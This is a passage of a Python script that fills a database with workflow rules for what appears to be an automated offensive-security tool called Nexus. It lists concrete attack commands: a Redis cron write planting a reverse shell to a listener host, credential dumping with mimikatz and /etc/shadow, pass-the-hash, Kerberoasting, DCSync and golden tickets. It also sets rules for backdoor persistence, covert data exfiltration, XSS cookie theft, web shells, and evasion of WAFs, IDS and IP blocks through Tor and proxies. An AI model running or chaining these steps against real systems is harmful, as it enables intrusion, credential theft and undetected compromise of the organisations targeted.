     ["hydra", "medusa"], 7,
     "Brute force SSH with discovered or common usernames",
     "Valid SSH credentials",
     ["WF-POST-001"],
     "reduce_threads_retry", 600, "high"),

    ("WF-EXPLOIT-020", "Default Credential Testing", "exploitation", "exploitation",
     "login_interface_found",
     ["test common defaults: admin/admin, admin/password, root/root, admin/changeme", "netexec {protocol} {target} -u admin -p admin"],
     ["netexec", "hydra"], 8,
     "Test default credentials on all discovered login interfaces and services",
     "Services accepting default credentials",
     ["WF-POST-001"],
     "log_and_continue", 180, "medium"),

    ("WF-EXPLOIT-021", "WordPress Exploitation", "exploitation", "exploitation",
     "wordpress_detected",
     ["wpscan --url {target} --enumerate ap,at -e vp,vt --plugins-detection aggressive", "exploit vulnerable plugins"],
     ["wpscan"], 8,
     "Exploit vulnerable WordPress plugins, themes, or core",
     "Shell access via plugin exploit, admin access",
     ["WF-POST-001", "WF-POST-010"],
     "try_different_plugin_exploits", 600, "medium"),

    ("WF-EXPLOIT-025", "XSS to Session Hijacking", "exploitation", "exploitation",
     "xss_vulnerability_confirmed",
     ["craft cookie-stealing payload", "setup listener", "inject payload", "capture session"],
     ["custom_xss_tools"], 8,
     "Exploit confirmed XSS to steal session cookies and hijack user sessions",
     "Stolen session cookie, authenticated access as victim",
     ["WF-POST-001"],
     "try_different_xss_context", 300, "medium"),

    ("WF-EXPLOIT-030", "Redis Unauthorized Access", "exploitation", "exploitation",
     "redis_no_auth",
     ["redis-cli -h {target} CONFIG SET dir /var/spool/cron/", "redis-cli -h {target} CONFIG SET dbfilename root", "redis-cli -h {target} SET x '\\n*/1 * * * * /bin/bash -i >& /dev/tcp/{lhost}/{lport} 0>&1\\n'"],
     ["redis-cli"], 8,
     "Exploit unauthenticated Redis for RCE via cron job or SSH key writing",
     "Remote code execution, reverse shell",
     ["WF-POST-001"],
     "try_ssh_key_write", 180, "high"),

    ("WF-EXPLOIT-035", "File Upload to RCE", "exploitation", "exploitation",
     "unrestricted_upload_found",
     ["upload web shell", "access uploaded shell", "execute commands"],
     ["curl", "custom_uploader"], 9,
     "Deploy web shell via unrestricted file upload vulnerability",
     "Web shell access, command execution",
     ["WF-POST-001", "WF-POST-002"],
     "try_extension_bypass", 300, "medium"),

    ("WF-EXPLOIT-040", "Subdomain Takeover", "exploitation", "exploitation",
     "dangling_cname_found",
     ["claim unclaimed resource (S3 bucket, GitHub Pages, Azure, Heroku)", "verify takeover"],
     ["aws", "custom_tools"], 8,
     "Exploit dangling DNS records to take over abandoned subdomains",
     "Full control of subdomain, phishing potential, cookie theft",
     ["WF-POST-010"],
     "log_and_continue", 300, "low"),

    # ─── POST-EXPLOITATION ──────────────────────────────────────────
    ("WF-POST-001", "Situational Awareness", "post_exploitation", "post_exploitation",
     "shell_obtained",
     ["whoami && id", "uname -a", "cat /etc/os-release", "ip addr", "ss -tlnp", "ps aux", "env", "cat /etc/passwd"],
     ["shell"], 9,
     "Gather system information after obtaining initial access",
     "User context, OS version, network config, running services, environment",
     ["WF-POST-002", "WF-POST-003", "WF-POST-005"],
     "stabilize_shell_first", 120, "low"),

    ("WF-POST-002", "Shell Stabilization", "post_exploitation", "post_exploitation",
     "unstable_shell_obtained",
     ["python3 -c 'import pty;pty.spawn(\"/bin/bash\")'", "export TERM=xterm", "stty raw -echo; fg"],
     ["python3", "bash"], 9,
     "Upgrade reverse shell to fully interactive TTY",
     "Stable interactive shell with tab completion and arrow keys",
     ["WF-POST-001"],
     "try_script_stabilization", 60, "low"),

    ("WF-POST-003", "Linux Privilege Escalation Recon", "post_exploitation", "post_exploitation",
     "linux_shell_obtained AND not_root",
     ["linpeas.sh", "find / -perm -4000 2>/dev/null", "sudo -l", "cat /etc/crontab", "ls -la /etc/shadow", "getcap -r / 2>/dev/null"],
     ["linpeas", "find", "sudo"], 9,
     "Enumerate privilege escalation vectors on Linux",
     "SUID binaries, sudo rights, cron jobs, capabilities, writable paths",
     ["WF-POST-004"],
     "try_manual_enum", 300, "low"),

    ("WF-POST-004", "Linux Privilege Escalation Exploit", "post_exploitation", "post_exploitation",
     "privesc_vector_found",
     ["exploit SUID binary", "exploit sudo misconfiguration", "exploit kernel vulnerability", "exploit writable cron"],
     ["custom_exploit"], 9,
     "Exploit discovered privilege escalation vector to gain root",
     "Root shell obtained",
     ["WF-POST-005", "WF-POST-008"],
     "try_alternative_vector", 300, "high"),

    ("WF-POST-005", "Windows Privilege Escalation Recon", "post_exploitation", "post_exploitation",
     "windows_shell_obtained AND not_system",
     ["winpeas.exe", "whoami /priv", "systeminfo", "net user", "net localgroup administrators", "reg query HKLM /s /f password", "schtasks /query"],
     ["winpeas", "systeminfo"], 9,
     "Enumerate privilege escalation vectors on Windows",
     "Token privileges, unquoted service paths, AlwaysInstallElevated, stored creds",
     ["WF-POST-006"],
     "try_manual_enum", 300, "low"),

    ("WF-POST-006", "Windows Privilege Escalation Exploit", "post_exploitation", "post_exploitation",
     "windows_privesc_vector_found",
     ["exploit token impersonation (Potato)", "exploit service misconfiguration", "exploit AlwaysInstallElevated"],
     ["custom_exploit"], 9,
     "Exploit privilege escalation to gain SYSTEM on Windows",
     "SYSTEM shell or admin access",
     ["WF-POST-007", "WF-POST-008"],
     "try_alternative_technique", 300, "high"),

    ("WF-POST-007", "Credential Harvesting", "post_exploitation", "post_exploitation",
     "elevated_access_obtained",
     ["mimikatz sekurlsa::logonpasswords", "hashdump", "cat /etc/shadow", "find / -name '*.conf' -exec grep -l password {} \\;", "reg query HKLM\\SOFTWARE /s /f password"],
     ["mimikatz", "hashdump"], 9,
     "Harvest credentials from memory, registry, files, and databases",
     "Passwords, hashes, tokens, SSH keys, certificates",
     ["WF-POST-008", "WF-LATERAL-001"],
     "try_alternative_dumping", 300, "medium"),

    ("WF-POST-008", "Persistence Establishment", "post_exploitation", "persistence",
     "elevated_access_obtained",
     ["create backdoor user", "install cron job", "modify startup scripts", "create scheduled task", "install SSH key"],
     ["custom_tools"], 7,
     "Establish persistence on compromised system for continued access",
     "Persistent backdoor installed",
     ["WF-POST-009"],
     "try_alternative_persistence", 300, "high"),

    ("WF-POST-009", "Data Exfiltration", "post_exploitation", "post_exploitation",
     "sensitive_data_found",
     ["compress and encrypt data", "exfiltrate via HTTP/DNS/ICMP", "staged exfiltration"],
     ["curl", "custom_tools"], 7,
     "Exfiltrate discovered sensitive data through covert channels",
     "Data successfully exfiltrated",
     ["WF-POST-010"],
     "try_alternative_channel", 600, "high"),

    ("WF-POST-010", "Evidence Collection and Cleanup", "post_exploitation", "covering_tracks",
     "operation_completing",
     ["collect screenshots", "save command history", "generate timeline", "remove artifacts"],
     ["custom_tools"], 8,
     "Collect evidence for report and clean up operational artifacts",
     "Evidence package, cleaned artifacts, operation log",
     [],
     "log_and_continue", 300, "medium"),

    # ─── LATERAL MOVEMENT ───────────────────────────────────────────
    ("WF-LATERAL-001", "Pass the Hash", "lateral_movement", "post_exploitation",
     "ntlm_hashes_obtained",
     ["impacket-psexec {domain}/{user}@{target} -hashes {hash}", "netexec smb {subnet} -u {user} -H {hash}"],
     ["impacket-psexec", "netexec"], 9,
     "Use obtained NTLM hashes for lateral movement via pass-the-hash",
     "Authenticated access on other systems",
     ["WF-POST-001"],
     "try_different_target", 300, "high"),

    ("WF-LATERAL-002", "Kerberoasting", "lateral_movement", "post_exploitation",
     "domain_user_access",
     ["impacket-GetUserSPNs {domain}/{user}:{password} -dc-ip {dc_ip} -request", "hashcat -m 13100 kerberos.txt /usr/share/wordlists/rockyou.txt"],
     ["impacket-GetUserSPNs", "hashcat"], 8,
     "Request TGS tickets for SPN accounts and crack offline",
     "Cracked service account passwords",
     ["WF-LATERAL-001", "WF-POST-001"],
     "try_different_wordlist", 600, "medium"),

    ("WF-LATERAL-003", "AS-REP Roasting", "lateral_movement", "post_exploitation",
     "domain_user_access",
     ["impacket-GetNPUsers {domain}/ -usersfile users.txt -no-pass -dc-ip {dc_ip}", "hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt"],
     ["impacket-GetNPUsers", "hashcat"], 8,
     "Find accounts without pre-authentication and crack their AS-REP hashes",
     "Cracked passwords for accounts with Kerberos pre-auth disabled",
     ["WF-LATERAL-001"],
     "log_and_continue", 600, "medium"),

    ("WF-LATERAL-004", "WMI Lateral Movement", "lateral_movement", "post_exploitation",
     "valid_credentials_obtained",
     ["impacket-wmiexec {domain}/{user}:{password}@{target}", "netexec smb {target} -u {user} -p {password} -x 'whoami'"],
     ["impacket-wmiexec", "netexec"], 8,
     "Execute commands on remote Windows systems via WMI",
     "Remote command execution on target systems",
     ["WF-POST-001"],
     "try_different_protocol", 180, "high"),

    ("WF-LATERAL-005", "SSH Key Pivoting", "lateral_movement", "post_exploitation",
     "ssh_keys_found",
     ["ssh -i stolen_key {user}@{target}", "ssh -D 1080 -i stolen_key {user}@{target}"],
     ["ssh"], 8,
     "Use discovered SSH keys to pivot to other systems",
     "Access to additional systems via SSH",
     ["WF-POST-001"],
     "try_different_key", 180, "medium"),

    ("WF-LATERAL-006", "BloodHound AD Analysis", "lateral_movement", "post_exploitation",
     "domain_user_access",
     ["bloodhound-python -d {domain} -u {user} -p {password} -c all -dc {dc_ip}", "analyze shortest path to Domain Admin"],
     ["bloodhound-python"], 9,
     "Collect and analyze AD data with BloodHound for attack paths to DA",
     "Attack paths to Domain Admin, ACL abuse opportunities, delegation issues",
     ["WF-LATERAL-001", "WF-LATERAL-007"],
     "try_different_collection_method", 600, "medium"),

    ("WF-LATERAL-007", "DCSync Attack", "lateral_movement", "post_exploitation",
     "domain_admin_obtained OR dcsync_rights",
     ["impacket-secretsdump {domain}/{user}:{password}@{dc_ip} -just-dc-ntlm"],
     ["impacket-secretsdump"], 9,
     "Perform DCSync to dump all domain password hashes",
     "Complete domain hash dump including krbtgt",
     ["WF-LATERAL-008"],
     "try_different_dc", 600, "high"),

    ("WF-LATERAL-008", "Golden Ticket", "lateral_movement", "post_exploitation",
     "krbtgt_hash_obtained",
     ["impacket-ticketer -nthash {krbtgt_hash} -domain {domain} -domain-sid {domain_sid} Administrator", "export KRB5CCNAME=ticket.ccache"],
     ["impacket-ticketer"], 9,
     "Create Golden Ticket for persistent domain-wide access",
     "Golden ticket created, unlimited domain access",
     ["WF-POST-008"],
     "verify_krbtgt_hash", 180, "high"),

    # ─── EVASION & RATE LIMIT ───────────────────────────────────────
    ("WF-EVASION-001", "Rate Limit Detection", "evasion", "any",
     "http_429_received OR connection_reset OR responses_slowing",
     ["detect response time increase", "detect HTTP 429/503 codes", "detect connection drops", "analyze response pattern changes"],
     ["custom_monitor"], 10,
     "Detect rate limiting, WAF blocking, or throttling by the target",
     "Rate limit threshold identified, blocking pattern detected",
     ["WF-EVASION-002", "WF-EVASION-003"],
     "immediate_pause", 60, "low"),

    ("WF-EVASION-002", "Adaptive Throttling", "evasion", "any",
     "rate_limit_detected",
     ["reduce request rate by 50%", "add random delays 1-5s between requests", "implement jitter", "rotate through slower timing profiles"],
     ["custom_throttle"], 10,
     "Automatically reduce request rate to stay under rate limit thresholds",
     "Requests resume without triggering rate limits",
     ["WF-EVASION-001"],
     "reduce_rate_further", 0, "high"),

    ("WF-EVASION-003", "IP Rotation", "evasion", "any",
     "ip_blocked",
     ["rotate proxy", "use tor circuit", "switch VPN endpoint", "use cloud functions for requests"],
     ["proxychains", "tor"], 9,
     "Rotate source IP when current IP is blocked or rate-limited",
     "New IP address, requests resume normally",
     ["WF-EVASION-001"],
     "wait_and_retry", 60, "high"),

    ("WF-EVASION-004", "User-Agent Rotation", "evasion", "any",
     "user_agent_blocked",
     ["rotate through common browser user agents", "use mobile user agents", "randomize user agent per request"],
     ["custom_rotator"], 7,
     "Rotate User-Agent headers to avoid fingerprinting",
     "Requests no longer blocked by user-agent filtering",
     [],
     "log_and_continue", 0, "medium"),

    ("WF-EVASION-005", "Request Timing Randomization", "evasion", "any",
     "scanning_detected_risk",
     ["add random delays 0.5-3s", "vary request patterns", "introduce human-like browsing behavior"],
     ["custom_timer"], 7,
     "Randomize request timing to evade scan detection systems",
     "Traffic pattern resembles normal browsing",
     [],
     "increase_delays", 0, "high"),

    ("WF-EVASION-010", "WAF Bypass - Encoding", "evasion", "exploitation",
     "waf_detected",
     ["URL encode payloads", "double URL encode", "Unicode normalization", "HTML entity encoding", "base64 encode in parameter"],
     ["custom_encoder"], 8,
     "Bypass WAF rules using various encoding techniques",
     "Payload delivered past WAF filtering",
     ["WF-EVASION-011"],
     "try_different_encoding", 180, "medium"),

    ("WF-EVASION-011", "WAF Bypass - Payload Mutation", "evasion", "exploitation",
     "waf_blocking_payloads",
     ["case variation", "comment insertion (/**/)", "alternate syntax", "null byte injection", "HTTP parameter pollution"],
     ["custom_mutator"], 8,
     "Mutate attack payloads to bypass WAF signature detection",
     "Mutated payload bypasses WAF rules",
     ["WF-EVASION-012"],
     "try_different_mutation", 180, "medium"),

    ("WF-EVASION-012", "WAF Bypass - HTTP Smuggling", "evasion", "exploitation",
     "waf_persistent_blocking",
     ["test CL.TE desync", "test TE.CL desync", "test HTTP/2 downgrade"],
     ["custom_smuggler"], 7,
     "Attempt to bypass WAF via HTTP request smuggling",
     "Request smuggled past WAF to backend",
     [],
     "log_and_continue", 300, "high"),

    ("WF-EVASION-013", "Target Unreachable - Smart Retry", "evasion", "any",
     "target_unreachable",
     ["wait 30s and retry", "check if IP changed", "try alternative ports", "check DNS resolution", "try different network path"],
     ["ping", "nslookup", "curl"], 10,
     "Handle target becoming unreachable: detect cause and adapt strategy",
     "Connection restored or alternative access path found",
     ["WF-EVASION-002", "WF-EVASION-003"],
     "escalate_to_operator", 300, "low"),

    ("WF-EVASION-014", "Connection Pool Management", "evasion", "any",
     "high_concurrency_scanning",
     ["limit concurrent connections to 5", "implement connection pooling", "reuse TCP connections", "implement keep-alive"],
     ["custom_pool"], 7,
     "Manage connection pools to avoid overwhelming target or triggering alerts",
     "Stable connections without drops or blocks",
     [],
     "reduce_connections", 0, "medium"),

    ("WF-EVASION-015", "Scan Fragmentation", "evasion", "enumeration",
     "ids_detected OR scan_blocked",
     ["nmap -f {target}", "nmap --mtu 24 {target}", "fragment packets", "use decoy scans"],
     ["nmap"], 7,
     "Fragment scan packets to evade IDS/IPS detection",
     "Scan results obtained despite IDS presence",
     [],
     "try_different_fragmentation", 300, "high"),

    # ─── REPORTING ──────────────────────────────────────────────────
    ("WF-REPORT-001", "Vulnerability Report Generation", "reporting", "reporting",
     "vulnerabilities_found",
     ["compile findings", "assign CVSS scores", "generate executive summary", "create technical details", "add remediation steps"],
     ["custom_reporter"], 8,
     "Generate comprehensive vulnerability report with findings and remediation",
     "PDF/HTML report with executive summary and technical details",
     [],
     "log_and_continue", 300, "low"),

    ("WF-REPORT-002", "Evidence Screenshot Collection", "reporting", "any",
     "vulnerability_confirmed",
     ["capture proof-of-concept screenshots", "save HTTP request/response pairs", "record exploitation steps"],
     ["screenshot_tool"], 7,
     "Collect evidence screenshots and request/response pairs for reporting",
     "Evidence package with timestamped screenshots and logs",
     [],
     "log_and_continue", 120, "low"),
]


def populate():
    """Insert all workflow rules into the database."""
    conn = get_connection()
    cursor = conn.cursor()

    # Ensure table exists
    cursor.execute("""CREATE TABLE IF NOT EXISTS workflow_rules (
        rule_id TEXT PRIMARY KEY, name TEXT, category TEXT, phase TEXT,
        trigger_condition TEXT, actions TEXT, tools_required TEXT,
        priority INTEGER DEFAULT 5, enabled BOOLEAN DEFAULT 1,
        description TEXT, expected_output TEXT, next_rules TEXT,
        failure_action TEXT, timeout INTEGER DEFAULT 300,
        stealth_level TEXT DEFAULT 'medium',
        knowledge_version INTEGER DEFAULT 1)""")

    # Clear existing rules
    cursor.execute("DELETE FROM workflow_rules")
    conn.commit()

    count = 0
    for rule in WORKFLOW_RULES:
        (rule_id, name, category, phase, trigger, actions,
         tools, priority, description, expected, next_rules,
         failure_action, timeout, stealth) = rule
        try:
            cursor.execute("""
                INSERT OR REPLACE INTO workflow_rules
                (rule_id, name, category, phase, trigger_condition,
                 actions, tools_required, priority, enabled, description,
                 expected_output, next_rules, failure_action, timeout,
                 stealth_level)
                VALUES (?,?,?,?,?,?,?,?,1,?,?,?,?,?,?)
            """, (rule_id, name, category, phase, trigger,
                  json.dumps(actions), json.dumps(tools), priority,
                  description, expected, json.dumps(next_rules),
                  failure_action, timeout, stealth))
            count += 1
        except Exception as e:
            logger.error(f"Error inserting {rule_id}: {e}")

    conn.commit()

    # Update knowledge version
    cursor.execute("SELECT COUNT(*) FROM workflow_rules")
    total = cursor.fetchone()[0]
    cursor.execute("""
        INSERT OR REPLACE INTO knowledge_versions (version, created_at, description, changes_summary)
        VALUES (?, ?, ?, ?)
    """, (3, datetime.now().isoformat(),
          "Workflow rules population v1",
          f"Added {total} workflow rules covering recon, enum, web, vuln, exploit, post-exploit, lateral, evasion, reporting"))
    conn.commit()
    conn.close()

    logger.info(f"✅ Populated {count} workflow rules")
    return count


if __name__ == "__main__":
    logger.info("=" * 60)
    logger.info("🚀 Nexus - Workflow Rules Population")
    logger.info("=" * 60)
    total = populate()
    logger.info(f"📊 Total: {total} rules inserted")
    logger.info("✅ Done!")
